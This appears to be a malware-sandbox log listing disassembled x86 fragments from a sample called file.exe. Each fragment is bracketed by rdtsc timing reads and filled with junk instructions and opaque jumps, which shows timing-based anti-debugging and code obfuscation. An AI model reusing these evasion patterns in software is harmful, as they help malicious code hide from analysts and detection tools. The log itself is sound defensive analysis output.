Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A3DF22 second address: A3DF6D instructions: 0x00000000 rdtsc 0x00000002 jg 00007F45B187B8D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jno 00007F45B187B8E2h 0x00000013 mov eax, dword ptr [esp+04h] 0x00000017 pushad 0x00000018 pushad 0x00000019 jmp 00007F45B187B8DAh 0x0000001e pushad 0x0000001f popad 0x00000020 popad 0x00000021 jmp 00007F45B187B8E1h 0x00000026 popad 0x00000027 mov eax, dword ptr [eax] 0x00000029 push eax 0x0000002a push edx 0x0000002b push edi 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A3DF6D second address: A3DF72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A3DF72 second address: A3DFA4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45B187B8E7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d pushad 0x0000000e jmp 00007F45B187B8DAh 0x00000013 jl 00007F45B187B8DCh 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A3DFA4 second address: A3DFD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 mov cx, si 0x00000009 call 00007F45B11B2369h 0x0000000e jng 00007F45B11B236Ah 0x00000014 push edx 0x00000015 push edi 0x00000016 pop edi 0x00000017 pop edx 0x00000018 push eax 0x00000019 push ecx 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F45B11B2372h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A3E3DC second address: A3E3FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F45B187B8E5h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A3E3FB second address: A3E434 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 nop 0x00000008 sub dl, FFFFFFA0h 0x0000000b mov dh, 6Bh 0x0000000d push 00000004h 0x0000000f mov dword ptr [ebp+12466ED2h], ecx 0x00000015 mov di, si 0x00000018 push eax 0x00000019 pushad 0x0000001a pushad 0x0000001b jmp 00007F45B11B236Dh 0x00000020 jmp 00007F45B11B236Ch 0x00000025 popad 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A3E434 second address: A3E438 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A3E438 second address: A3E43C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A3EA80 second address: A3EA85 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A3EA85 second address: A3EAD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a mov di, dx 0x0000000d mov ecx, dword ptr [ebp+1247CF1Ah] 0x00000013 lea eax, dword ptr [ebp+1248C5F9h] 0x00000019 adc cx, EA8Eh 0x0000001e push eax 0x0000001f mov ecx, dword ptr [ebp+122D2DCFh] 0x00000025 pop edi 0x00000026 nop 0x00000027 pushad 0x00000028 push edi 0x00000029 jmp 00007F45B11B236Ah 0x0000002e pop edi 0x0000002f ja 00007F45B11B2368h 0x00000035 push edi 0x00000036 pop edi 0x00000037 popad 0x00000038 push eax 0x00000039 je 00007F45B11B2374h 0x0000003f pushad 0x00000040 jp 00007F45B11B2366h 0x00000046 push eax 0x00000047 push edx 0x00000048 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A3EAD2 second address: A3EB36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 nop 0x00000006 mov dword ptr [ebp+1247C77Ch], ebx 0x0000000c lea eax, dword ptr [ebp+1248C5B5h] 0x00000012 push 00000000h 0x00000014 push ebx 0x00000015 call 00007F45B187B8D8h 0x0000001a pop ebx 0x0000001b mov dword ptr [esp+04h], ebx 0x0000001f add dword ptr [esp+04h], 0000001Ch 0x00000027 inc ebx 0x00000028 push ebx 0x00000029 ret 0x0000002a pop ebx 0x0000002b ret 0x0000002c jmp 00007F45B187B8E1h 0x00000031 nop 0x00000032 pushad 0x00000033 push eax 0x00000034 jbe 00007F45B187B8D6h 0x0000003a pop eax 0x0000003b push edx 0x0000003c ja 00007F45B187B8D6h 0x00000042 pop edx 0x00000043 popad 0x00000044 push eax 0x00000045 pushad 0x00000046 push eax 0x00000047 push edx 0x00000048 jc 00007F45B187B8D6h 0x0000004e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A3EB36 second address: A1E0A7 instructions: 0x00000000 rdtsc 0x00000002 je 00007F45B11B2366h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jno 00007F45B11B2366h 0x00000011 jnp 00007F45B11B2366h 0x00000017 popad 0x00000018 popad 0x00000019 nop 0x0000001a push 00000000h 0x0000001c push edx 0x0000001d call 00007F45B11B2368h 0x00000022 pop edx 0x00000023 mov dword ptr [esp+04h], edx 0x00000027 add dword ptr [esp+04h], 0000001Ch 0x0000002f inc edx 0x00000030 push edx 0x00000031 ret 0x00000032 pop edx 0x00000033 ret 0x00000034 jns 00007F45B11B2372h 0x0000003a mov dword ptr [ebp+1245A046h], esi 0x00000040 call dword ptr [ebp+122D18ACh] 0x00000046 jmp 00007F45B11B2376h 0x0000004b push eax 0x0000004c push edx 0x0000004d jmp 00007F45B11B236Fh 0x00000052 jmp 00007F45B11B2379h 0x00000057 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A1E0A7 second address: A1E0B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F45B187B8DDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A1E0B8 second address: A1E0D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45B11B2378h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A67C76 second address: A67C7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A67C7C second address: A67CAA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F45B11B2370h 0x0000000f jmp 00007F45B11B2374h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A67CAA second address: A67CB4 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F45B187B8D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A681D5 second address: A681DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F45B11B2366h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A681DF second address: A681E5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A6834F second address: A68353 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A6E04E second address: A6E056 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A6E056 second address: A6E05A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A6CC93 second address: A6CCC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F45B187B8E7h 0x0000000b popad 0x0000000c jnl 00007F45B187B8E2h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A6D486 second address: A6D48E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A6D77B second address: A6D784 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A6D8EA second address: A6D8FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45B11B2370h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A6D8FE second address: A6D942 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F45B187B8DEh 0x00000008 push edx 0x00000009 pop edx 0x0000000a jno 00007F45B187B8D6h 0x00000010 jnc 00007F45B187B8E6h 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push ebx 0x00000019 jmp 00007F45B187B8E8h 0x0000001e push edi 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9F41F9 second address: 9F4211 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007F45B11B236Ch 0x0000000a push edi 0x0000000b pop edi 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9F4211 second address: 9F4217 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A72C85 second address: A72C89 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A72C89 second address: A72C91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A72DCA second address: A72DD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A72DD0 second address: A72DD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A72DD4 second address: A72DDA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A7338E second address: A7339A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F45B187B8D6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A73517 second address: A7355B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45B11B2371h 0x00000007 jmp 00007F45B11B2374h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jp 00007F45B11B236Ch 0x00000014 push edx 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 pop edx 0x00000018 popad 0x00000019 pushad 0x0000001a pushad 0x0000001b ja 00007F45B11B2366h 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A7355B second address: A73572 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F45B187B8DFh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A73572 second address: A73578 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A73A1C second address: A73A24 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A73A24 second address: A73A34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F45B11B236Ah 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A73A34 second address: A73A38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A73A38 second address: A73A6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F45B11B2373h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jc 00007F45B11B236Eh 0x00000011 pushad 0x00000012 popad 0x00000013 jo 00007F45B11B2366h 0x00000019 pop edx 0x0000001a pop eax 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e jng 00007F45B11B2366h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A73A6A second address: A73AAF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45B187B8DFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a jg 00007F45B187B8D6h 0x00000010 jng 00007F45B187B8D6h 0x00000016 pop edi 0x00000017 pushad 0x00000018 jmp 00007F45B187B8DAh 0x0000001d jmp 00007F45B187B8E5h 0x00000022 pushad 0x00000023 popad 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A741E7 second address: A74204 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45B11B2373h 0x00000007 jng 00007F45B11B2366h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A74204 second address: A74209 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A74209 second address: A7420F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A72983 second address: A72994 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F45B187B8D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A72994 second address: A72998 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A72998 second address: A729B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45B187B8E9h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A729B5 second address: A729CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F45B11B236Bh 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A729CC second address: A729E6 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F45B187B8ECh 0x00000008 jmp 00007F45B187B8E0h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A729E6 second address: A729FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007F45B11B236Ch 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A75DA6 second address: A75DBE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45B187B8E3h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A7C76E second address: A7C77E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F45B11B236Bh 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A7C77E second address: A7C784 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A7C784 second address: A7C788 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9FC67C second address: 9FC686 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F45B187B8D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A81AE6 second address: A81AEA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A81AEA second address: A81B06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jmp 00007F45B187B8E0h 0x0000000c pop ecx 0x0000000d push ebx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A81B06 second address: A81B0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9EEF0F second address: 9EEF13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9EEF13 second address: 9EEF54 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F45B11B2378h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jnc 00007F45B11B2374h 0x00000011 jno 00007F45B11B2368h 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9EEF54 second address: 9EEF58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9EEF58 second address: 9EEF78 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007F45B11B237Ah 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8151B second address: A81521 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A81521 second address: A81536 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jns 00007F45B11B2366h 0x0000000d jc 00007F45B11B2366h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8696C second address: A86976 instructions: 0x00000000 rdtsc 0x00000002 js 00007F45B187B8D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A86E1D second address: A86E21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A86E21 second address: A86E2D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jno 00007F45B187B8D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A86F86 second address: A86F8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A86F8A second address: A86F90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A3E58D second address: A3E597 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F45B11B2366h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A3E597 second address: A3E636 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45B187B8DEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007F45B187B8D8h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 00000014h 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 movzx edi, ax 0x00000029 mov edi, dword ptr [ebp+122D3180h] 0x0000002f mov ebx, dword ptr [ebp+1248C5F4h] 0x00000035 push 00000000h 0x00000037 push edi 0x00000038 call 00007F45B187B8D8h 0x0000003d pop edi 0x0000003e mov dword ptr [esp+04h], edi 0x00000042 add dword ptr [esp+04h], 0000001Ah 0x0000004a inc edi 0x0000004b push edi 0x0000004c ret 0x0000004d pop edi 0x0000004e ret 0x0000004f xor edx, 6E359044h 0x00000055 add eax, ebx 0x00000057 push 00000000h 0x00000059 push edi 0x0000005a call 00007F45B187B8D8h 0x0000005f pop edi 0x00000060 mov dword ptr [esp+04h], edi 0x00000064 add dword ptr [esp+04h], 00000016h 0x0000006c inc edi 0x0000006d push edi 0x0000006e ret 0x0000006f pop edi 0x00000070 ret 0x00000071 nop 0x00000072 pushad 0x00000073 push eax 0x00000074 push edx 0x00000075 jmp 00007F45B187B8E3h 0x0000007a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A3E636 second address: A3E643 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F45B11B2366h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A3E643 second address: A3E693 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push ecx 0x0000000a jl 00007F45B187B8E2h 0x00000010 jmp 00007F45B187B8DCh 0x00000015 pop ecx 0x00000016 nop 0x00000017 call 00007F45B187B8E8h 0x0000001c mov dl, 01h 0x0000001e pop edx 0x0000001f push 00000004h 0x00000021 pushad 0x00000022 or ah, FFFFFFA4h 0x00000025 push eax 0x00000026 mov esi, dword ptr [ebp+122D3558h] 0x0000002c pop ebx 0x0000002d popad 0x0000002e push eax 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 pushad 0x00000033 popad 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A3E693 second address: A3E698 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A87B79 second address: A87BA8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jng 00007F45B187B8D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jno 00007F45B187B8D6h 0x00000013 pop eax 0x00000014 popad 0x00000015 push edi 0x00000016 push eax 0x00000017 pushad 0x00000018 popad 0x00000019 push edx 0x0000001a pop edx 0x0000001b pop eax 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F45B187B8DFh 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A87BA8 second address: A87BAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8BBB4 second address: A8BBE4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45B187B8DFh 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f jmp 00007F45B187B8E4h 0x00000014 pushad 0x00000015 popad 0x00000016 pop esi 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8BD3F second address: A8BD45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8BD45 second address: A8BD49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8BD49 second address: A8BD60 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45B11B2373h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8C178 second address: A8C193 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop ebx 0x00000007 jmp 00007F45B187B8E4h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8C193 second address: A8C1B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45B11B2377h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jc 00007F45B11B2378h 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A90E77 second address: A90E7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
